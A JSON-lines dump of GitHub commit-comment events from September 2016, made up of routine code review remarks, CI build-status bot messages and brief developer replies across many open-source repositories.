{"id":"4643692575","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19241613,"position":null,"line":null,"path":null,"commit_id":"e8212d33a0d6f58b518a9158ab419201a07d853a","created_at":"2016-09-30T14:15:46Z","updated_at":"2016-09-30T14:15:46Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1224](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14715&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T14:15:46Z"}
{"id":"4643692898","type":"CommitCommentEvent","actor":{"login":"SnapperRy"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19241614,"position":null,"line":null,"path":null,"commit_id":"2deea99cd7b87b082d1da8469d3ecc73346ae440","created_at":"2016-09-30T14:15:49Z","updated_at":"2016-09-30T14:15:49Z","body":"Right :P changing it now."}},"created_at":"2016-09-30T14:15:49Z"}
{"id":"4643693817","type":"CommitCommentEvent","actor":{"login":"RavenX8"},"repo":{"name":"RavenX8/osIROSE-new"},"payload":{"comment":{"id":19241622,"position":28,"line":40,"path":"src/map/include/entitySystems.h","commit_id":"0ea3481725b66cdf94d7719289ea3311707bac0f","created_at":"2016-09-30T14:15:59Z","updated_at":"2016-09-30T14:15:59Z","body":"You have to be very careful here. This check can easily fail if you are moving too fast. This whole system is prone to an error where you move so fast that you can never reach the destination so you'll just be rubber-banding around the destination."}},"created_at":"2016-09-30T14:15:59Z"}
{"id":"4643694651","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241625,"position":6,"line":1,"path":"app/index.js","commit_id":"83101d15a1d83f257e831c79d08726d9150b591e","created_at":"2016-09-30T14:16:09Z","updated_at":"2016-09-30T14:16:09Z","body":"Dashboard is a single word, so no need for capitalized B"}},"created_at":"2016-09-30T14:16:09Z"}
{"id":"4643695971","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"sindresorhus/ponyfill"},"payload":{"comment":{"id":19241627,"position":14,"line":51,"path":"readme.md","commit_id":"0ab04b9be348218dfc292187571d01b77b1c5b90","created_at":"2016-09-30T14:16:23Z","updated_at":"2016-09-30T14:16:23Z","body":"Yeah, you're right. https://github.com/sindresorhus/ponyfill/commit/ab9a673a674b61f6658389d85fb3be943a0f1228"}},"created_at":"2016-09-30T14:16:23Z"}
{"id":"4643696031","type":"CommitCommentEvent","actor":{"login":"pjaspers"},"repo":{"name":"pjaspers/dotfiles"},"payload":{"comment":{"id":19241628,"position":null,"line":null,"path":null,"commit_id":"31bfa0dc7096b9c6ca389e3b55566b9b1d6b27a7","created_at":"2016-09-30T14:16:24Z","updated_at":"2016-09-30T14:16:24Z","body":"And if you're on Sierra and iOS10 it automatically gets copied to all your devices!*\r\n\r\n* Sometimes. Not for me, my machines are what they call broken."}},"created_at":"2016-09-30T14:16:24Z"}
{"id":"4643696208","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":19241630,"position":9,"line":14,"path":"zeronet/lilac.py","commit_id":"9780a82a22b815c90c8964f26d7ae4b76dc5a1f6","created_at":"2016-09-30T14:16:26Z","updated_at":"2016-09-30T14:16:26Z","body":"这个注释会误导人的。"}},"created_at":"2016-09-30T14:16:26Z"}
{"id":"4643700578","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19241644,"position":38,"line":75,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/store/parquet/ParquetReaderUtility.java","commit_id":"ab0427ba0f56634bd3b34471932f2d0679e21097","created_at":"2016-09-30T14:17:13Z","updated_at":"2016-09-30T14:17:13Z","body":"represented by @param binaryTimeStampValue not type"}},"created_at":"2016-09-30T14:17:13Z"}
{"id":"4643703793","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19241651,"position":null,"line":null,"path":null,"commit_id":"e8212d33a0d6f58b518a9158ab419201a07d853a","created_at":"2016-09-30T14:17:45Z","updated_at":"2016-09-30T14:17:45Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1224](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14715&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:01:59"}},"created_at":"2016-09-30T14:17:45Z"}
{"id":"4643704407","type":"CommitCommentEvent","actor":{"login":"apurba007"},"repo":{"name":"mi5t4n/Wordlist"},"payload":{"comment":{"id":19241653,"position":2,"line":2,"path":"Wordlist","commit_id":"34e74101cba6b4c19479e7e93328a7626341be85","created_at":"2016-09-30T14:17:52Z","updated_at":"2016-09-30T14:17:52Z","body":"1234567890"}},"created_at":"2016-09-30T14:17:52Z"}
{"id":"4643705471","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241656,"position":1,"line":1,"path":"app/team/statusField/addTaskForm.html","commit_id":"3bd8f3d98be5e07af99046c01e6f4b9120d95087","created_at":"2016-09-30T14:18:03Z","updated_at":"2016-09-30T14:18:03Z","body":"eslint does not check style for html, but it's a good practice to follow it here too, like here with spaces after ``,``\r\n`submit(task, addTaskForm.$valid)`"}},"created_at":"2016-09-30T14:18:03Z"}
{"id":"4643705674","type":"CommitCommentEvent","actor":{"login":"Kevin-Wei"},"repo":{"name":"dchbx/enroll"},"payload":{"comment":{"id":19241659,"position":4,"line":76,"path":"app/models/hbx_enrollment.rb","commit_id":"46e180718f88df9f6132627e4cc4860e3efe9c50","created_at":"2016-09-30T14:18:06Z","updated_at":"2016-09-30T14:18:06Z","body":"Should I add this back? @hlee "}},"created_at":"2016-09-30T14:18:06Z"}
{"id":"4643707463","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241664,"position":6,"line":3,"path":"app/team/statusField/addTaskForm.html","commit_id":"3bd8f3d98be5e07af99046c01e6f4b9120d95087","created_at":"2016-09-30T14:18:24Z","updated_at":"2016-09-30T14:18:24Z","body":"Looks like placeholder"}},"created_at":"2016-09-30T14:18:24Z"}
{"id":"4643707642","type":"CommitCommentEvent","actor":{"login":"trainline-em-bot"},"repo":{"name":"trainline/environment-manager"},"payload":{"comment":{"id":19241665,"position":null,"line":null,"path":null,"commit_id":"7ec2952a3fdc94f9e74da8c1d2399c5abe17e617","created_at":"2016-09-30T14:18:25Z","updated_at":"2016-09-30T14:18:25Z","body":"TeamCity Platform Services :: Environment Manager :: Run Tests [Build 28](http://infra.teamcity.ci.ttldev/viewLog.html?buildId=33122&buildTypeId=PlatformServices_EnvironmentManager_RunTests) is now running\n"}},"created_at":"2016-09-30T14:18:25Z"}
{"id":"4643711534","type":"CommitCommentEvent","actor":{"login":"glyg"},"repo":{"name":"DamCB/tyssue"},"payload":{"comment":{"id":19241669,"position":null,"line":null,"path":null,"commit_id":"1666a91039558eeaf16a2e5f9b39aa75ff5e130a","created_at":"2016-09-30T14:19:05Z","updated_at":"2016-09-30T14:19:05Z","body":"Hey, are you sure you added the test files to the repo? I don't see any new tests in geometry/test_geometry\r\n\r\nG."}},"created_at":"2016-09-30T14:19:05Z"}
{"id":"4643711616","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241670,"position":7,"line":7,"path":"app/team/statusField/choosingUser.html","commit_id":"3bd8f3d98be5e07af99046c01e6f4b9120d95087","created_at":"2016-09-30T14:19:06Z","updated_at":"2016-09-30T14:19:06Z","body":"Watch out for comments :) You do not want them sneaking in your production code"}},"created_at":"2016-09-30T14:19:06Z"}
{"id":"4643713099","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241673,"position":3,"line":3,"path":"app/team/statusField/choosingUser.html","commit_id":"3bd8f3d98be5e07af99046c01e6f4b9120d95087","created_at":"2016-09-30T14:19:20Z","updated_at":"2016-09-30T14:19:20Z","body":"Also placeholder"}},"created_at":"2016-09-30T14:19:20Z"}
{"id":"4643714231","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19241678,"position":11,"line":11,"path":"ALGORYTHMS/sort_files/qsort.cpp","commit_id":"a272cdb01362da9ed22e12a9979782176fc2fab3","created_at":"2016-09-30T14:19:32Z","updated_at":"2016-09-30T14:19:32Z","body":"ИМХО\r\nИмя `list` немного вводит в заблуждение, так как там на самом деле вектор.\r\nКроме того у тебя `using namespace std;`, в котором есть свой `list` – потенциальная коллизия имён."}},"created_at":"2016-09-30T14:19:32Z"}
{"id":"4643714804","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19241679,"position":6,"line":195,"path":"exec/java-exec/src/test/java/org/apache/drill/TestBuilder.java","commit_id":"ab0427ba0f56634bd3b34471932f2d0679e21097","created_at":"2016-09-30T14:19:37Z","updated_at":"2016-09-30T14:19:37Z","body":"two commas?"}},"created_at":"2016-09-30T14:19:37Z"}
{"id":"4643717480","type":"CommitCommentEvent","actor":{"login":"wuxipaopao"},"repo":{"name":"FreeCodeCampChina/freecodecamp.cn"},"payload":{"comment":{"id":19241686,"position":null,"line":null,"path":null,"commit_id":"4b6e25bdaec776775bd33ffb17c01ce0408bce99","created_at":"2016-09-30T14:20:04Z","updated_at":"2016-09-30T14:20:04Z","body":"居然是第一个啊，我也没想到。\r\n另外练习页面上BUG按钮提交问题的链接指向的还是原来的huluoyang/freecodecamp.cn，应该要改到目前这个FreeCodeCampChina/freecodecamp.cn吧"}},"created_at":"2016-09-30T14:20:04Z"}
{"id":"4643717816","type":"CommitCommentEvent","actor":{"login":"trainline-em-bot"},"repo":{"name":"trainline/environment-manager"},"payload":{"comment":{"id":19241687,"position":null,"line":null,"path":null,"commit_id":"7ec2952a3fdc94f9e74da8c1d2399c5abe17e617","created_at":"2016-09-30T14:20:08Z","updated_at":"2016-09-30T14:20:08Z","body":"TeamCity Platform Services :: Environment Manager :: Run Tests [Build 28](http://infra.teamcity.ci.ttldev/viewLog.html?buildId=33122&buildTypeId=PlatformServices_EnvironmentManager_RunTests) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:01:42"}},"created_at":"2016-09-30T14:20:08Z"}
{"id":"4643718085","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19241689,"position":16,"line":16,"path":"ALGORYTHMS/sort_files/qsort.cpp","commit_id":"a272cdb01362da9ed22e12a9979782176fc2fab3","created_at":"2016-09-30T14:20:11Z","updated_at":"2016-09-30T14:20:11Z","body":":+1:"}},"created_at":"2016-09-30T14:20:11Z"}
{"id":"4643719186","type":"CommitCommentEvent","actor":{"login":"aserratorta"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":19241691,"position":null,"line":null,"path":null,"commit_id":"b88f171fda0ba336aebb01a2bbfae9e316d3c429","created_at":"2016-09-30T14:20:21Z","updated_at":"2016-09-30T14:20:21Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Sort coworkers category by name](https://trello.com/c/RvYDUs73/61-sort-coworkers-category-by-name)"}},"created_at":"2016-09-30T14:20:21Z"}
{"id":"4643719338","type":"CommitCommentEvent","actor":{"login":"Bachmann1234"},"repo":{"name":"Bachmann1234/java9_kernel"},"payload":{"comment":{"id":19241692,"position":null,"line":null,"path":null,"commit_id":"bbbbefc5dcd869148ed7f5577924d2ac0598ff72","created_at":"2016-09-30T14:20:22Z","updated_at":"2016-09-30T14:20:22Z","body":"Not really. I choose not to distribute kulla to avoid running into issues distributing their binaries without permission. \r\n\r\nWhat error are you seeing? "}},"created_at":"2016-09-30T14:20:22Z"}
{"id":"4643720776","type":"CommitCommentEvent","actor":{"login":"Yieron"},"repo":{"name":"Yieron/Android_summary"},"payload":{"comment":{"id":19241695,"position":null,"line":null,"path":null,"commit_id":"370d33b21431aecdb25e197e94c053dfed20cc93","created_at":"2016-09-30T14:20:37Z","updated_at":"2016-09-30T14:20:37Z","body":"开发中遇到的困难错误，解决方案"}},"created_at":"2016-09-30T14:20:37Z"}
{"id":"4643721881","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19241697,"position":56,"line":796,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/physical/impl/writer/TestParquetWriter.java","commit_id":"ab0427ba0f56634bd3b34471932f2d0679e21097","created_at":"2016-09-30T14:20:48Z","updated_at":"2016-09-30T14:20:48Z","body":"no need to use string.format:\r\ntest(\"alter session set %s = false\", ExecConstants.PARQUET_NEW_RECORD_READER);"}},"created_at":"2016-09-30T14:20:48Z"}
{"id":"4643722942","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19241702,"position":58,"line":798,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/physical/impl/writer/TestParquetWriter.java","commit_id":"ab0427ba0f56634bd3b34471932f2d0679e21097","created_at":"2016-09-30T14:20:59Z","updated_at":"2016-09-30T14:20:59Z","body":"the same as above"}},"created_at":"2016-09-30T14:20:59Z"}
{"id":"4643724217","type":"CommitCommentEvent","actor":{"login":"apurba007"},"repo":{"name":"mi5t4n/Wordlist"},"payload":{"comment":{"id":19241706,"position":2,"line":2,"path":"Wordlist","commit_id":"34e74101cba6b4c19479e7e93328a7626341be85","created_at":"2016-09-30T14:21:12Z","updated_at":"2016-09-30T14:21:12Z","body":"`1234567890`"}},"created_at":"2016-09-30T14:21:12Z"}
{"id":"4643725020","type":"CommitCommentEvent","actor":{"login":"JohannesPfeifer"},"repo":{"name":"DynareTeam/dynare"},"payload":{"comment":{"id":19241707,"position":null,"line":null,"path":null,"commit_id":"9b1dc544cb08df8b3e24dd4966cd11eff03c5354","created_at":"2016-09-30T14:21:21Z","updated_at":"2016-09-30T14:21:21Z","body":"@houtanb I thought the correct fix is #1289 "}},"created_at":"2016-09-30T14:21:21Z"}
{"id":"4643725272","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19241708,"position":7,"line":33,"path":"compiler/frontend.java/src/org/jetbrains/kotlin/load/kotlin/incremental/IncrementalPackagePartProvider.kt","commit_id":"408bc84f87dab2f4a9bdadb76bff15d77022aaf2","created_at":"2016-09-30T14:21:23Z","updated_at":"2016-09-30T14:21:23Z","body":"Formatting issue"}},"created_at":"2016-09-30T14:21:23Z"}
{"id":"4643727524","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19241711,"position":84,"line":913,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/physical/impl/writer/TestParquetWriter.java","commit_id":"ab0427ba0f56634bd3b34471932f2d0679e21097","created_at":"2016-09-30T14:21:45Z","updated_at":"2016-09-30T14:21:45Z","body":"run to the next line"}},"created_at":"2016-09-30T14:21:45Z"}
{"id":"4643729083","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19241719,"position":28,"line":28,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T14:22:02Z","updated_at":"2016-09-30T14:22:02Z","body":"The work on gpio interrupt is derived from the previous work of ccaione (https://patchwork.kernel.org/patch/7738781/). Some part are just copy/paste, some are completely rewritten.\r\n\r\nShould I add endless copyright here ? "}},"created_at":"2016-09-30T14:22:02Z"}
{"id":"4643731422","type":"CommitCommentEvent","actor":{"login":"jklaus"},"repo":{"name":"aliostad/BeeHive"},"payload":{"comment":{"id":19241728,"position":12,"line":12,"path":"sample/BeeHive.Sample.NewsFeedKeywordNotification.Impl/Actors/NewsPulseActor.cs","commit_id":"0847579cb8585a84b5338d58ffe6070f19464bf7","created_at":"2016-09-30T14:22:25Z","updated_at":"2016-09-30T14:22:25Z","body":"Should the description be \"NewsPulse-Disseminate\" or \"NewsPulse-Capture\".  Per your readme it seems like it should be capture."}},"created_at":"2016-09-30T14:22:25Z"}
{"id":"4643733289","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241732,"position":64,"line":64,"path":"app/team/statusField/statusField.js","commit_id":"3bd8f3d98be5e07af99046c01e6f4b9120d95087","created_at":"2016-09-30T14:22:45Z","updated_at":"2016-09-30T14:22:45Z","body":"Looks like a good case for a refactoring, a little too complicated.\r\nAlso, get will be done only when controller is loaded, but you might need to call this ``init`` later on somewhere, so better to create a controller method ``init`` or something and call it here."}},"created_at":"2016-09-30T14:22:45Z"}
{"id":"4643734268","type":"CommitCommentEvent","actor":{"login":"houtanb"},"repo":{"name":"DynareTeam/dynare"},"payload":{"comment":{"id":19241733,"position":null,"line":null,"path":null,"commit_id":"9b1dc544cb08df8b3e24dd4966cd11eff03c5354","created_at":"2016-09-30T14:22:55Z","updated_at":"2016-09-30T14:22:55Z","body":"Ah thanks @JohannesPfeifer I had missed this PR"}},"created_at":"2016-09-30T14:22:55Z"}
{"id":"4643735762","type":"CommitCommentEvent","actor":{"login":"arthurthefourth"},"repo":{"name":"Soundflyinc/mixpanel_client"},"payload":{"comment":{"id":19241737,"position":11,"line":164,"path":"lib/mixpanel/client.rb","commit_id":"812d0c43f2ba045b357d27626ee81adf4975a808","created_at":"2016-09-30T14:23:11Z","updated_at":"2016-09-30T14:23:11Z","body":"It should, right? Our Mixpanel project's been on hold for a couple weeks, so I can't test it out, but I can't see any reason why that wouldn't do the same thing.\r\n\r\nI was thinking about cleaning this up and making a PR when we were done, but again, on hold…so feel free to take what you will. :)"}},"created_at":"2016-09-30T14:23:11Z"}
{"id":"4643736716","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19241743,"position":107,"line":107,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T14:23:22Z","updated_at":"2016-09-30T14:23:22Z","body":"The IP is supposed to be an 8 to 256 mux but since the upper part should not have any pad mapped to it, it seems better to have this\r\n\r\nDo you agree ?"}},"created_at":"2016-09-30T14:23:22Z"}
{"id":"4643736771","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19241744,"position":33,"line":774,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/physical/impl/writer/TestParquetWriter.java","commit_id":"ab0427ba0f56634bd3b34471932f2d0679e21097","created_at":"2016-09-30T14:23:22Z","updated_at":"2016-09-30T14:23:22Z","body":"remove string.format"}},"created_at":"2016-09-30T14:23:22Z"}
{"id":"4643737042","type":"CommitCommentEvent","actor":{"login":"grawity"},"repo":{"name":"traviscross/mtr"},"payload":{"comment":{"id":19241746,"position":null,"line":null,"path":null,"commit_id":"b90a522f23167bd00062504803e94220937aba23","created_at":"2016-09-30T14:23:24Z","updated_at":"2016-09-30T14:23:24Z","body":"@kerolasa Are you sure \"setting all missing values using value of the last item that was set\" is actually a feature? As far as I know (and [tested](https://gist.github.com/grawity/7fdee16e4330e4ae5cea70f98fe2e3ed)), unspecified values are always initialized to zero..."}},"created_at":"2016-09-30T14:23:24Z"}
{"id":"4643737112","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19241747,"position":30,"line":771,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/physical/impl/writer/TestParquetWriter.java","commit_id":"ab0427ba0f56634bd3b34471932f2d0679e21097","created_at":"2016-09-30T14:23:25Z","updated_at":"2016-09-30T14:23:25Z","body":"remove string.format"}},"created_at":"2016-09-30T14:23:25Z"}
{"id":"4643738021","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19241748,"position":29,"line":770,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/physical/impl/writer/TestParquetWriter.java","commit_id":"ab0427ba0f56634bd3b34471932f2d0679e21097","created_at":"2016-09-30T14:23:33Z","updated_at":"2016-09-30T14:23:33Z","body":"remove string.format"}},"created_at":"2016-09-30T14:23:33Z"}
{"id":"4643740990","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241755,"position":75,"line":75,"path":"app/team/statusField/statusField.js","commit_id":"3bd8f3d98be5e07af99046c01e6f4b9120d95087","created_at":"2016-09-30T14:23:58Z","updated_at":"2016-09-30T14:23:58Z","body":"Right now StatusField factory is small, but it can grow in the future, you might want to extract it (and in similar cases too) into a separate file at an early stage."}},"created_at":"2016-09-30T14:23:58Z"}
{"id":"4643743278","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19241757,"position":7,"line":33,"path":"compiler/frontend.java/src/org/jetbrains/kotlin/load/kotlin/incremental/IncrementalPackagePartProvider.kt","commit_id":"408bc84f87dab2f4a9bdadb76bff15d77022aaf2","created_at":"2016-09-30T14:24:20Z","updated_at":"2016-09-30T14:24:20Z","body":"I find formatting OK here, how do you expect it to look?"}},"created_at":"2016-09-30T14:24:20Z"}
{"id":"4643744040","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19241758,"position":192,"line":192,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T14:24:29Z","updated_at":"2016-09-30T14:24:29Z","body":"Part of the IRQ_EDGE_BOTH hack described below "}},"created_at":"2016-09-30T14:24:29Z"}
{"id":"4643744676","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19241759,"position":28,"line":769,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/physical/impl/writer/TestParquetWriter.java","commit_id":"ab0427ba0f56634bd3b34471932f2d0679e21097","created_at":"2016-09-30T14:24:36Z","updated_at":"2016-09-30T14:24:36Z","body":"testImpalaParquetBinaryTimeStamp_DictChange:\r\nTimeStamp -> Timestamp\r\nDictChange -> rename, expand Dict"}},"created_at":"2016-09-30T14:24:36Z"}
{"id":"4643746022","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241767,"position":93,"line":93,"path":"app/team/statusField/statusField.js","commit_id":"3bd8f3d98be5e07af99046c01e6f4b9120d95087","created_at":"2016-09-30T14:24:50Z","updated_at":"2016-09-30T14:24:50Z","body":"```js\r\nif (!isValid) {\r\n  return;\r\n}\r\n\r\n// some logic here\r\n```"}},"created_at":"2016-09-30T14:24:50Z"}
{"id":"4643749548","type":"CommitCommentEvent","actor":{"login":"geerlingguy"},"repo":{"name":"geerlingguy/ansible-role-apache-php-fpm"},"payload":{"comment":{"id":19241775,"position":31,"line":31,"path":"README.md","commit_id":"f35e1b5f6576bb427ee4764f215dfa06b7823371","created_at":"2016-09-30T14:25:26Z","updated_at":"2016-09-30T14:25:26Z","body":"You're correct! I updated the README just now. Thanks."}},"created_at":"2016-09-30T14:25:26Z"}
{"id":"4643749575","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19241776,"position":75,"line":75,"path":"ALGORYTHMS/sort_files/qsort_test.cpp","commit_id":"a272cdb01362da9ed22e12a9979782176fc2fab3","created_at":"2016-09-30T14:25:27Z","updated_at":"2016-09-30T14:25:27Z","body":"ИМХО\r\nЧем второй раз руками эти данные вбивать, лучше воспользоваться `std::sort()`.\r\n\r\nСм. [принцип Don't Repeat Yourself](https://en.wikipedia.org/wiki/Don%27t_repeat_yourself)."}},"created_at":"2016-09-30T14:25:27Z"}
{"id":"4643749848","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241777,"position":92,"line":92,"path":"app/team/statusField/statusField.js","commit_id":"3bd8f3d98be5e07af99046c01e6f4b9120d95087","created_at":"2016-09-30T14:25:30Z","updated_at":"2016-09-30T14:25:30Z","body":"when you use camelCase (e.g. isValid) it makes your code more readable"}},"created_at":"2016-09-30T14:25:30Z"}
{"id":"4643751671","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19241782,"position":89,"line":89,"path":"ALGORYTHMS/sort_files/qsort_test.cpp","commit_id":"a272cdb01362da9ed22e12a9979782176fc2fab3","created_at":"2016-09-30T14:25:48Z","updated_at":"2016-09-30T14:25:48Z","body":":+1:"}},"created_at":"2016-09-30T14:25:48Z"}
{"id":"4643753288","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241788,"position":99,"line":99,"path":"app/team/statusField/statusField.js","commit_id":"3bd8f3d98be5e07af99046c01e6f4b9120d95087","created_at":"2016-09-30T14:26:05Z","updated_at":"2016-09-30T14:26:05Z","body":"no need for a new line, just write `then(function(...`"}},"created_at":"2016-09-30T14:26:05Z"}
{"id":"4643755776","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19241796,"position":null,"line":null,"path":null,"commit_id":"620268fe3fd351573a6ba81d84b296256aa9058e","created_at":"2016-09-30T14:26:28Z","updated_at":"2016-09-30T14:26:28Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1225](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14718&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T14:26:28Z"}
{"id":"4643756072","type":"CommitCommentEvent","actor":{"login":"RavenX8"},"repo":{"name":"RavenX8/osIROSE-new"},"payload":{"comment":{"id":19241798,"position":5,"line":104,"path":"src/map/src/cmapclient.cpp","commit_id":"1fdc38bed5f7e7010ab0841ad1bc2bb22587ddd8","created_at":"2016-09-30T14:26:33Z","updated_at":"2016-09-30T14:26:33Z","body":"why StatusEffects over Position?"}},"created_at":"2016-09-30T14:26:33Z"}
{"id":"4643757041","type":"CommitCommentEvent","actor":{"login":"hlee"},"repo":{"name":"dchbx/enroll"},"payload":{"comment":{"id":19241802,"position":4,"line":76,"path":"app/models/hbx_enrollment.rb","commit_id":"46e180718f88df9f6132627e4cc4860e3efe9c50","created_at":"2016-09-30T14:26:41Z","updated_at":"2016-09-30T14:26:41Z","body":"yup, we called this field on the view"}},"created_at":"2016-09-30T14:26:41Z"}
{"id":"4643757912","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19241803,"position":22,"line":22,"path":"ALGORYTHMS/sort_files/sort_files.cpp","commit_id":"a272cdb01362da9ed22e12a9979782176fc2fab3","created_at":"2016-09-30T14:26:49Z","updated_at":"2016-09-30T14:26:49Z","body":"Странный дефолт, лучше `\".\"`."}},"created_at":"2016-09-30T14:26:49Z"}
{"id":"4643757917","type":"CommitCommentEvent","actor":{"login":"NuclearCoder"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19241804,"position":3,"line":0,"path":"sources/tokens/tokens.c","commit_id":"bedccdba490074216dcd38bfa2469ed342d471b7","created_at":"2016-09-30T14:26:49Z","updated_at":"2016-09-30T14:26:49Z","body":"maybe include a smaller library which contains the *alloc functions"}},"created_at":"2016-09-30T14:26:49Z"}
{"id":"4643758502","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19241805,"position":null,"line":null,"path":null,"commit_id":"620268fe3fd351573a6ba81d84b296256aa9058e","created_at":"2016-09-30T14:26:55Z","updated_at":"2016-09-30T14:26:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1225](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14718&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:26"}},"created_at":"2016-09-30T14:26:55Z"}
{"id":"4643759290","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19241808,"position":41,"line":116,"path":"src/utils/string.h","commit_id":"7281e2187eb86669e77ef5eaa050492b12344b61","created_at":"2016-09-30T14:27:03Z","updated_at":"2016-09-30T14:27:03Z","body":"Indenting. Fixed for you in fb7cd6a5724e9488da941cb53dfe624b5c0df4e0."}},"created_at":"2016-09-30T14:27:03Z"}
